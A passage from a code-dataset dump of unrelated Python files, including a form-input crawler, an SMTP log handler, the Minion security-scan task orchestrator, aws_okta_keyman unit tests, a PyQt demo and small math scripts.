index=False)\n\n'''\n##############################################################################################################################################################################################################\n\n############################ Find 'input'TagName In HTML File 
################################################################################################################################################\n\nurlList = read_csv('targetUrl.csv')\ntagDic = {'url': 'inputtagList'}\ninputTagNameList = list()\n\nfor i in range(len(urlList)):\n    with open('./html/'+str(i)+'.txt', 'r', encoding='utf8') as html:\n        soup2 = BeautifulSoup(html, 'html.parser')\n        formList = soup2.find_all('form')\n        for form in formList:\n            inputTagNameList = list()\n            inputTagList = form.find_all('input')\n            for inputTag in inputTagList:\n                inputTagNameList.append(inputTag.get('name'))\n            tagDic[urlList['url'][i]] = inputTagNameList\n\nprint(len(urlList['url']))\nprint(len(tagDic))\n\nw_count = {'url': 'count'}\n\nfor url in urlList['url']:\n    try:\n        w_count[url] += 1\n    except:\n        w_count[url] = 1\n\nprint(w_count)\n","sub_path":"Python_crawling2/Python_crawing5.py","file_name":"Python_crawing5.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"520590258","text":"# -*- coding: utf-8 -*-\n\n# Read a UTF-8 file without a BOM in Python\n\n\ntext=[]\nclient=[] # customer-service (agent) messages\ncustomer=[] # customer messages\n\nwith open(\"messages.txt\",encoding=\"utf-8\") as t:\n    text_all=t.readlines()\n    for index,i in enumerate(text_all):\n        line=i.strip().encode('utf-8').decode('utf-8-sig')\n        text.append(index)\n        #if line.find(\"王\")==0: # find returns the index where the substring occurs\n\n\n\n\n\n\n\n\nprint(enumerate(text_all))\n\n","sub_path":"basics/text_extract.py","file_name":"text_extract.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"490019287","text":"from lileb.transformations.TransformationTree import TransformationTree\n\n\nclass IdentityTransformation(TransformationTree):\n    def __init__(self, *args, **kwargs):\n        super(IdentityTransformation, self).__init__(*args, **kwargs)\n\n    def build_tree(self):\n        self.tree.add_node(self._node_index[self.name], name=self.name)\n        node_name = 'Id'\n        self.leaf_nodes.add(self._node_index[node_name])\n        self.tree.add_node(self._node_index[node_name], name=node_name)\n        self.tree.add_edge(self._node_index[self.name],\n                           self._node_index[node_name],\n                           f=lambda x: x)\n        self.depth = 1\n        return self._node_index[self.name]\n","sub_path":"Lileb/lileb/transformations/IdentityTransformation.py","file_name":"IdentityTransformation.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"556856508","text":"ans=[]\r\nfor i in range(1,1000002):\r\n    h=[0 for j in range(10)]\r\n    n=i\r\n    temp=n\r\n    j=1\r\n    while h.count(0):\r\n        while n:\r\n            h[n%10]=1\r\n            n=n//10\r\n        j=j+1\r\n        n=temp*j\r\n    ans.append(n-temp)\r\n#print (ans)\r\nt=int(input())\r\nfor i in range(t):\r\n    n=int(input())\r\n    if not n:\r\n        print('Case #'+str(i+1)+': INSOMNIA')\r\n    else:\r\n        print('Case #'+str(i+1)+': '+str(ans[n-1]))","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_Agham_gcj1.py","file_name":"16_0_1_Agham_gcj1.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"419052546","text":"\n# ch.3 exercise 1\n# This program will calculate the volume and surface area of a sphere from its radius.\n\n\n\n\nimport math\n# I wanted to utilize the import math library. 
Trial and error led me to using math.pi.\n\ndef main():\n\n    rad = eval(input(\"Enter the radius: \"))\n    # formulas I used to calculate the area and volume\n    vol = ((4 / 3) * round(math.pi, 2) * rad ** 3)  # true division: 4 // 3 would truncate to 1\n    # V = 4/3 * pi * radius^3\n    area = (4 * round(math.pi, 2) * rad ** 2)\n    # A = 4 * pi * radius^2\n    print(\"the volume of the sphere from its radius is\" , vol, \"while the area of a sphere from its radius is\", area)\n\nmain()\n\n\n","sub_path":"ComputingNumbers/area&vol.py","file_name":"area&vol.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
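# A minimal sanity check of the sphere formulas used above, with the
# full-precision math.pi instead of the rounded value; the radius r = 2 is a
# hypothetical choice, not part of the original file.
import math

r = 2
volume = (4 / 3) * math.pi * r ** 3  # V = 4/3 * pi * r^3, about 33.51 for r = 2
area = 4 * math.pi * r ** 2          # A = 4 * pi * r^2,  about 50.27 for r = 2
assert abs(volume - 33.5103) < 1e-3
assert abs(area - 50.2655) < 1e-3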
+{"seq_id":"280938933","text":"import collections\n\nfrom logbook import (\n    MailHandler as _MailHandler, NOTSET, Handler, StringFormatterHandlerMixin,\n    Logger, LimitingHandlerMixin)\n\nchatlogbot_logger = Logger('chatlogbot')\ngimlibot_logger = Logger('gimlibot')\nbirthdaybot_logger = Logger('birthdaybot')\n\n\n# Taken from unreleased Logbook 1.0, need it for SMTP_SSL\nclass MailHandler(_MailHandler):\n    def __init__(self, from_addr, recipients, subject=None,\n                 server_addr=None, credentials=None, secure=None,\n                 record_limit=None, record_delta=None, level=NOTSET,\n                 format_string=None, related_format_string=None,\n                 filter=None, bubble=False, starttls=True):\n\n        Handler.__init__(self, level, filter, bubble)\n        StringFormatterHandlerMixin.__init__(self, format_string)\n        LimitingHandlerMixin.__init__(self, record_limit, record_delta)\n        self.from_addr = from_addr\n        self.recipients = recipients\n        if subject is None:\n            subject = self.default_subject\n        self.subject = subject\n        self.server_addr = server_addr\n        self.credentials = credentials\n        self.secure = secure\n        if related_format_string is None:\n            related_format_string = self.default_related_format_string\n        self.related_format_string = related_format_string\n        self.starttls = starttls\n\n    def get_connection(self):\n        \"\"\"Returns an SMTP connection. By default it reconnects for\n        each sent mail.\n        \"\"\"\n        from smtplib import SMTP, SMTP_SSL, SMTP_PORT, SMTP_SSL_PORT\n        if self.server_addr is None:\n            host = '127.0.0.1'\n            port = self.secure and SMTP_SSL_PORT or SMTP_PORT\n        else:\n            try:\n                host, port = self.server_addr\n            except ValueError:\n                # If server_addr is a string, the tuple unpacking will raise\n                # ValueError, and we can use the default port.\n                host = self.server_addr\n                port = self.secure and SMTP_SSL_PORT or SMTP_PORT\n\n        # Previously, self.secure was passed as con.starttls(*self.secure). This\n        # meant that starttls couldn't be used without a keyfile and certfile\n        # unless an empty tuple was passed. See issue #94.\n        #\n        # The changes below allow passing:\n        # - secure=True for secure connection without checking identity.\n        # - dictionary with keys 'keyfile' and 'certfile'.\n        # - tuple to be unpacked to variables keyfile and certfile.\n        # - secure=() equivalent to secure=True for backwards compatibility.\n        # - secure=False equivalent to secure=None to disable.\n        if isinstance(self.secure, collections.Mapping):\n            keyfile = self.secure.get('keyfile', None)\n            certfile = self.secure.get('certfile', None)\n        elif isinstance(self.secure, collections.Iterable):\n            if len(self.secure) == 0:\n                keyfile = certfile = None\n            else:\n                keyfile, certfile = self.secure\n        else:\n            keyfile = certfile = None\n\n        # Allow starttls to be disabled by passing starttls=False.\n        if not self.starttls and self.secure:\n            con = SMTP_SSL(host, port, keyfile=keyfile, certfile=certfile)\n        else:\n            con = SMTP(host, port)\n\n        if self.credentials is not None:\n            secure = self.secure\n            if self.starttls and secure is not None and secure is not False:\n                con.ehlo()\n                con.starttls(keyfile=keyfile, certfile=certfile)\n                con.ehlo()\n\n            # Allow credentials to be a tuple or dict.\n            if isinstance(self.credentials, collections.Mapping):\n                credentials_args = ()\n                credentials_kwargs = self.credentials\n            else:\n                credentials_args = self.credentials\n                credentials_kwargs = dict()\n\n            con.login(*credentials_args, **credentials_kwargs)\n        return con\n","sub_path":"telegrambots/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"586199017","text":"#!/bin/python3\n\n# from src.DataGenerator import MetaData, DataGenerator\nfrom src.architecture import DeepFakeDetector, DeefFakeDetectorTF\nfrom src.video2tfrecordCustom import TfRecordDecoder, Video2TFRecord\nimport json, math\nimport horovod.tensorflow.keras as hvd\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\n\nif __name__ == \"__main__\":\n\n    FRAME_COUNT_PER_EXAMPLE = 60\n    BATCH_SIZE = 8\n    NUM_SETS_PER_VIDEO = 4\n\n    inception_path = 'weights/InceptionV3_Non_Trainable.h5'\n\n    with open('data/metadata.json') as f:\n        data = json.load(f)\n\n    numSteps = len(trainDataGenerator)\n\n    hvd.init()\n\n    config = tf.ConfigProto()\n    config.gpu_options.visible_device_list = str(hvd.local_rank())\n    K.set_session(tf.Session(config=config))\n\n    epochs = int(math.ceil(numSteps / hvd.size()))\n\n    opt = tf.keras.optimizers.Adadelta(1.0 * hvd.size())\n\n    opt = hvd.DistributedOptimizer(opt)\n\n    DF.compile(optimizer=opt)\n\n    callbacks = [\n        hvd.callbacks.BroadcastGlobalVariablesCallback(0),\n    ]\n\n    # Horovod: save checkpoints only on worker 0 to prevent other workers from corrupting them.\n    if hvd.rank() == 0:\n        callbacks.append(tf.keras.callbacks.ModelCheckpoint('./weights/checkpoint-{epoch}.h5'))\n\n    # opt = tf.keras.optimizers.Adadelta(1.0)\n    # DF.compile(optimizer=opt)\n    # epochs = numSteps\n    DF.model.fit_generator(trainDataGenerator, steps_per_epoch=epochs, epochs=1, verbose=1, use_multiprocessing=False, workers=1) #callbacks=callbacks)\n\n\n    # train(train_data_generator=, val_data_generator=None, steps_per_epoch=epochs, callbacks=callbacks, use_multiprocessing=False)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"624544944","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n\nimport time\n\nfrom celery import Celery\nfrom celery.app.control import Control\nfrom celery.utils.log import get_task_logger\nfrom celery.execute import send_task\nfrom celery.task.control import revoke\nfrom celery.exceptions import TaskRevokedError\nfrom pymongo import MongoClient\nimport requests\n\nfrom minion.backend.utils import backend_config\n\n\ncfg = backend_config()\ncelery = Celery('tasks', broker=cfg['celery']['broker'], backend=cfg['celery']['backend'])\nlogger = get_task_logger(__name__)\n\n\ndef get_scan(api_url, scan_id):\n r = requests.get(api_url + \"/scans/\" + scan_id)\n r.raise_for_status()\n j = r.json()\n return j['scan']\n\ndef queue_for_session(session, cfg):\n queue = 'plugin'\n if 'plugin_worker_queues' in cfg:\n weight = session['plugin']['weight']\n if weight in ('heavy', 'light'):\n queue = cfg['plugin_worker_queues'][weight]\n return queue\n\n@celery.task(ignore_result=True)\ndef scan(scan_id):\n\n #\n # See if the scan exists.\n #\n\n scan = get_scan(cfg['api']['url'], scan_id)\n if not scan:\n logger.error(\"Cannot load scan %s\" % scan_id)\n return\n\n #\n # Is the scan in the right state to be started?\n #\n\n if scan['state'] != 'QUEUED':\n logger.error(\"Scan %s has invalid state. Expected QUEUED but got %s\" % (scan_id, scan['state']))\n return\n\n #\n # Move the scan to the STARTED state\n #\n\n scan['state'] = 'STARTED'\n #scans.update({\"id\": scan_id}, {\"$set\": {\"state\": \"STARTED\", \"started\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.scan_start\",\n [scan_id, time.time()],\n queue='state').get()\n \n #\n # Run each plugin session\n #\n\n for session in scan['sessions']:\n\n #\n # Mark the session as QUEUED\n #\n\n session['state'] = 'QUEUED'\n #scans.update({\"id\": scan['id'], \"sessions.id\": session['id']}, {\"$set\": {\"sessions.$.state\": \"QUEUED\", \"sessions.$.queued\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.session_queue\",\n [scan['id'], session['id'], time.time()],\n queue='state').get()\n \n #\n # Execute the plugin. 
The plugin worker will set the session state and issues.\n #\n\n logger.info(\"Scan %s running plugin %s\" % (scan['id'], session['plugin']['class']))\n\n queue = queue_for_session(session, cfg)\n result = send_task(\"minion.backend.plugin_worker.run_plugin\",\n [scan_id, session['id']],\n queue=queue)\n \n #scans.update({\"id\": scan_id, \"sessions.id\": session['id']}, {\"$set\": {\"sessions.$._task\": result.id}})\n send_task(\"minion.backend.state_worker.session_set_task_id\",\n [scan_id, session['id'], result.id],\n queue='state').get()\n\n try:\n plugin_result = result.get()\n except TaskRevokedError as e:\n plugin_result = \"STOPPED\"\n\n session['state'] = plugin_result\n\n #\n # If the user stopped the workflow or if the plugin aborted then stop the whole scan\n #\n \n if plugin_result in ('ABORTED', 'STOPPED'):\n # Mark the scan as failed\n #scans.update({\"id\": scan_id}, {\"$set\": {\"state\": plugin_result, \"finished\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.scan_finish\",\n [scan_id, plugin_result, time.time()],\n queue='state').get()\n # Mark all remaining sessions as cancelled\n for s in scan['sessions']:\n if s['state'] == 'CREATED':\n s['state'] = 'CANCELLED'\n #scans.update({\"id\": scan['id'], \"sessions.id\": s['id']}, {\"$set\": {\"sessions.$.state\": \"CANCELLED\", \"sessions.$.finished\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.session_finish\",\n [scan['id'], s['id'], \"CANCELLED\", time.time()],\n queue='state').get()\n # We are done with this scan\n return\n \n #\n # Move the scan to the FINISHED state\n #\n\n scan['state'] = 'FINISHED'\n #scans.update({\"id\": scan_id}, {\"$set\": {\"state\": \"FINISHED\", \"finished\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.scan_finish\",\n [scan_id, \"FINISHED\", time.time()],\n queue='state').get()\n","sub_path":"minion/backend/scan_worker.py","file_name":"scan_worker.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139449734","text":"from __future__ import unicode_literals\n\nimport logging\nimport sys\nimport unittest\n\nfrom aws_okta_keyman import aws, okta\nfrom aws_okta_keyman.keyman import Keyman\n\nif sys.version_info[0] < 3: # Python 2\n import mock\nelse:\n from unittest import mock\n\n\nclass KeymanTest(unittest.TestCase):\n\n def test_setup_logging(self):\n # Simple execution test - make sure that the logger code executes and\n # returns a root logger. 
No mocks used here, want to ensure that the\n # options passed to the logger are valid.\n ret = Keyman.setup_logging()\n self.assertEquals(type(ret), type(logging.getLogger()))\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_init_blank_args(self, _config_mock):\n keyman = Keyman([''])\n assert isinstance(keyman, Keyman)\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_init_use_debug(self, config_mock):\n config_mock().debug = True\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz', '-D'])\n log_level = logging.getLevelName(keyman.log.getEffectiveLevel())\n self.assertEqual('DEBUG', log_level)\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_init_bad_config(self, config_mock):\n config_mock().get_config.side_effect = ValueError\n with self.assertRaises(SystemExit):\n Keyman([])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_main(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.handle_appid_selection = mock.MagicMock()\n keyman.user_password = mock.MagicMock()\n keyman.user_password.return_value = 'foo'\n keyman.init_okta = mock.MagicMock()\n keyman.auth_okta = mock.MagicMock()\n keyman.aws_auth_loop = mock.MagicMock()\n\n keyman.main()\n\n assert keyman.handle_appid_selection.called\n assert keyman.user_password.called\n keyman.init_okta.assert_called_with('foo')\n assert keyman.auth_okta.called\n assert keyman.aws_auth_loop.called\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_main_keyboard_interrupt(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.handle_appid_selection = mock.MagicMock()\n keyman.user_password = mock.MagicMock()\n keyman.user_password.side_effect = KeyboardInterrupt\n\n with self.assertRaises(SystemExit):\n keyman.main()\n\n @mock.patch('aws_okta_keyman.keyman.input')\n def test_user_input(self, input_mock):\n input_mock.return_value = 'test'\n self.assertEqual('test', Keyman.user_input('input test'))\n\n @mock.patch('aws_okta_keyman.keyman.getpass')\n def test_user_password(self, pass_mock):\n pass_mock.getpass.return_value = 'test'\n self.assertEqual('test', Keyman.user_password())\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_selector_menu(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n stdout_mock = mock.Mock()\n sys.stdout = stdout_mock\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = 0\n stuff = [{'artist': 'Metallica'},\n {'artist': 'Soundgarden'}]\n ret = keyman.selector_menu(stuff, 'artist', 'Artist')\n self.assertEqual(ret, 0)\n stdout_mock.assert_has_calls([\n mock.call.write('[0] Artist: Metallica'),\n mock.call.write('\\n'),\n mock.call.write('[1] Artist: Soundgarden'),\n mock.call.write('\\n')\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_selector_menu_keep_asking_if_out_of_range(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n stdout_mock = mock.Mock()\n sys.stdout = stdout_mock\n keyman.user_input = mock.MagicMock()\n keyman.user_input.side_effect = [99, 98, 0]\n stuff = [{'artist': 'Metallica'},\n {'artist': 'Soundgarden'}]\n ret = keyman.selector_menu(stuff, 'artist', 'Artist')\n self.assertEqual(ret, 0)\n keyman.user_input.assert_has_calls([\n mock.call('Artist selection: '),\n mock.call('Artist selection: '),\n mock.call('Artist selection: ')\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_handle_appid_selection(self, _config_mock):\n 
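# selector_menu is mocked to pick index 0, so the appid should be resolved\n        # from the first (and only) configured account below.\n        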
keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar'])\n keyman.config.accounts = [{'name': 'myAccount', 'appid': 'myID'}]\n keyman.config.appid = None\n keyman.selector_menu = mock.MagicMock(name='selector_menu')\n keyman.selector_menu.return_value = 0\n keyman.config.set_appid_from_account_id = mock.MagicMock()\n\n keyman.handle_appid_selection()\n\n keyman.selector_menu.assert_has_calls([\n mock.call(\n [{'name': 'myAccount', 'appid': 'myID'}],\n 'name', 'Account')\n ])\n keyman.config.set_appid_from_account_id.assert_has_calls([\n mock.call(0)\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_handle_appid_selection_when_appid_provided(self, config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n config_mock().appid = 'someid'\n self.assertEqual(keyman.handle_appid_selection(), None)\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n @mock.patch('aws_okta_keyman.keyman.okta_saml')\n def test_init_okta(self, okta_mock, _config_mock):\n okta_mock.OktaSaml = mock.MagicMock()\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.init_okta('troz')\n\n okta_mock.OktaSaml.assert_has_calls([\n mock.call(mock.ANY, mock.ANY, 'troz')\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n @mock.patch('aws_okta_keyman.keyman.okta_saml')\n def test_init_okta_with_oktapreview(self, okta_mock, _config_mock):\n okta_mock.OktaSaml = mock.MagicMock()\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.config.oktapreview = True\n keyman.init_okta('troz')\n\n okta_mock.OktaSaml.assert_has_calls([\n mock.call(mock.ANY, mock.ANY, 'troz', oktapreview=True)\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n @mock.patch('aws_okta_keyman.keyman.okta_saml')\n def test_init_okta_with_empty_input(self, okta_mock, _config_mock):\n okta_mock.EmptyInput = BaseException\n okta_mock.OktaSaml = mock.MagicMock()\n okta_mock.OktaSaml.side_effect = okta.EmptyInput\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n with self.assertRaises(SystemExit):\n keyman.init_okta('troz')\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.return_value = None\n\n ret = keyman.auth_okta()\n self.assertEqual(ret, None)\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_bad_password(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.side_effect = okta.InvalidPassword\n\n with self.assertRaises(SystemExit):\n keyman.auth_okta()\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_mfa(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.side_effect = okta.PasscodeRequired('a', 'b',\n 'c')\n keyman.okta_client.validate_mfa.return_value = True\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = '000000'\n\n keyman.auth_okta()\n\n keyman.okta_client.validate_mfa.assert_has_calls([\n mock.call('a', 'b', '000000'),\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_mfa_retry(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.side_effect = okta.PasscodeRequired('a', 'b',\n 'c')\n 
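# validate_mfa fails on the first attempt and succeeds on the second, so the\n        # passcode prompt loop should call it twice with the same code.\n        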
keyman.okta_client.validate_mfa.side_effect = [False, True]\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = '000000'\n\n keyman.auth_okta()\n\n keyman.okta_client.validate_mfa.assert_has_calls([\n mock.call('a', 'b', '000000'),\n mock.call('a', 'b', '000000'),\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_answer(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n factor = {'id': 'foo', 'profile': {'questionText': 'a'}}\n keyman.okta_client.auth.side_effect = okta.AnswerRequired(factor, 'b')\n keyman.okta_client.validate_answer.return_value = True\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = 'Someanswer'\n\n keyman.auth_okta()\n\n keyman.okta_client.validate_answer.assert_has_calls([\n mock.call('foo', 'b', 'Someanswer'),\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_answer_retry(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n factor = {'id': 'foo', 'profile': {'questionText': 'a'}}\n keyman.okta_client.auth.side_effect = okta.AnswerRequired(factor, 'b')\n keyman.okta_client.validate_answer.side_effect = [False, True]\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = 'Someanswer'\n\n keyman.auth_okta()\n\n keyman.okta_client.validate_answer.assert_has_calls([\n mock.call('foo', 'b', 'Someanswer'),\n mock.call('foo', 'b', 'Someanswer'),\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_unknown_error(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.side_effect = okta.UnknownError\n\n with self.assertRaises(SystemExit):\n keyman.auth_okta()\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_handle_multiple_roles(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.selector_menu = mock.MagicMock()\n keyman.selector_menu.return_value = 0\n roles = [{}, {}]\n mock_session = mock.MagicMock()\n mock_session.available_roles.return_value = roles\n\n ret = keyman.handle_multiple_roles(mock_session)\n\n self.assertEqual(ret, 0)\n\n keyman.selector_menu.assert_has_calls([\n mock.call([{}, {}], 'role', 'Role')\n ])\n mock_session.assert_has_calls([\n mock.call.available_roles(),\n mock.call.set_role(mock.ANY),\n mock.call.assume_role()\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n @mock.patch('aws_okta_keyman.keyman.aws')\n def test_start_session(self, aws_mock, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.get_assertion.return_value = 'assertion'\n aws_mock.Session = mock.MagicMock()\n\n keyman.start_session()\n\n keyman.okta_client.assert_has_calls([\n mock.call.get_assertion(appid=mock.ANY, apptype='amazon_aws')\n ])\n aws_mock.assert_has_calls([\n mock.call.Session('assertion', profile=mock.ANY)\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_start_session_failure(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.get_assertion.side_effect = okta.UnknownError\n\n with self.assertRaises(SystemExit):\n keyman.start_session()\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_aws_auth_loop(self, config_mock):\n 
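# With reup disabled the auth loop makes a single pass: start a session,\n        # then assume the role.\n        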
config_mock().reup = False\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.start_session = mock.MagicMock()\n\n keyman.aws_auth_loop()\n\n keyman.start_session.assert_has_calls([\n mock.call(),\n mock.call().assume_role()\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_aws_auth_loop_multirole(self, config_mock):\n config_mock().reup = False\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.start_session = mock.MagicMock()\n keyman.start_session().assume_role.side_effect = aws.MultipleRoles\n keyman.handle_multiple_roles = mock.MagicMock()\n\n keyman.aws_auth_loop()\n\n keyman.handle_multiple_roles.assert_has_calls([\n mock.call(mock.ANY)\n ])\n","sub_path":"aws_okta_keyman/test/keyman_test.py","file_name":"keyman_test.py","file_ext":"py","file_size_in_byte":13409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"115926523","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# See https://doc.qt.io/qt-5/qpainter.html#drawText\n\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtCore import Qt\n\nclass MyPaintWidget(QWidget):\n\n def __init__(self):\n super().__init__()\n\n # Set window background color\n self.setAutoFillBackground(True)\n\n palette = self.palette()\n palette.setColor(self.backgroundRole(), Qt.white)\n\n self.setPalette(palette)\n\n def paintEvent(self, event):\n qp = QPainter(self)\n\n font = qp.font()\n font.setPointSize(32)\n qp.setFont(font)\n\n size = self.size()\n qp.drawText(0, 0, size.width(), size.height(), Qt.AlignCenter, \"Hello\")\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n widget = MyPaintWidget()\n widget.show()\n\n # The mainloop of the application. The event handling starts from this point.\n # The exec_() method has an underscore. It is because the exec is a Python keyword. 
And thus, exec_() was used instead.\n    exit_code = app.exec_()\n\n    # The sys.exit() method ensures a clean exit.\n    # The environment will be informed how the application ended.\n    sys.exit(exit_code)\n","sub_path":"python/pyqt/pyqt5/widget_QPainter_draw_text.py","file_name":"widget_QPainter_draw_text.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"375307457","text":"import pylab\nimport numpy as np\nfrom cvxopt import solvers, matrix\n\nfrom matplotlib import rc\n\nrc('font', family='serif', size='15')\nrc('axes', labelsize='large')\nrc('legend', numpoints=1)\n\nx = np.arange(-1, 1, 1e-4)\n\ndef plot_polys(x, ps, **kws):\n    pys = [np.polyval(p, x) for p in ps]\n    for py in pys:\n        pylab.plot(x, py, **kws)\n\ndef find_closest(xs, ymins, ymaxs, d):\n    \"\"\"Find the degree d polynomial minimizing max dist\"\"\"\n    A = np.vstack([xs**(d-i) for i in range(d+1)])\n    G = np.bmat([[A.T, -np.ones((len(xs), 1))],\n                 [-A.T, -np.ones((len(xs), 1))]])\n    h = np.bmat([ymins, -ymaxs]).T\n    c = np.bmat([np.zeros(d+1), [1]]).T\n    ans = solvers.lp(matrix(c), matrix(G), matrix(h))\n    sol = ans['x']\n    p = sol[:-1]\n    dist = sol[-1]\n    return (np.array(p), dist)\n\ndef evaluate(x, ps, d, plot=True):\n    pys = np.array([np.polyval(p, x) for p in ps])\n    mins = np.min(pys, axis=0)\n    maxs = np.max(pys, axis=0)\n    sigma = np.max(maxs-mins)/2\n    pmin, dist = find_closest(x, mins, maxs, d)\n    eval = np.polyval(pmin, x)\n    real_dist = max(np.max(np.abs(py - eval)) for py in pys)\n    if plot:\n        plot_polys(x, ps, lw=1, color=\"red\", label=\"Quadratics within $2\\sigma$ of each other for all $x$\")\n        real_dist *= 0.999\n        pylab.fill_between(x, maxs - real_dist, mins + real_dist, alpha=0.3, label=\"Region within 1.09$\\\\sigma$ of all three possible $p$\")\n        plot_polys(x, [pmin], lw=3, label=\"Does not fully include any quadratics\")\n    return (real_dist / sigma)\n\npylab.clf()\nz = (6 - 4*2**.5)\nps = np.array([[1, -z, z-1], [1, z, z-1], [0, 0, 0]])\nps[:, 0] -= 1\nps[:, -1] += 1\nps /= np.max(np.sum(ps, axis=1))\nps *= 